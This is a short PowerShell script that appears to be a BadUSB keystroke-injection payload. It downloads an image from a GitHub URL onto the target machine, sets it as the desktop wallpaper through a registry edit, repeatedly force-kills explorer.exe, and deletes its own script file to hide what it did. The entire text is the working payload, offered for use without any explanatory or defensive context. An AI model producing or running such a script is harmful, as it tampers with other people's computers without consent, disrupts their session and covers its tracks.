cd \;
(New-Object System.Net.Webclient).DownloadFile("https://raw.githubusercontent.com/18838167725/badusb2/master/pic.jpg","d:\x.jpg");
Start-Sleep -Seconds 15;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d d:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d d:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Remove-Item get.ps1;
exit;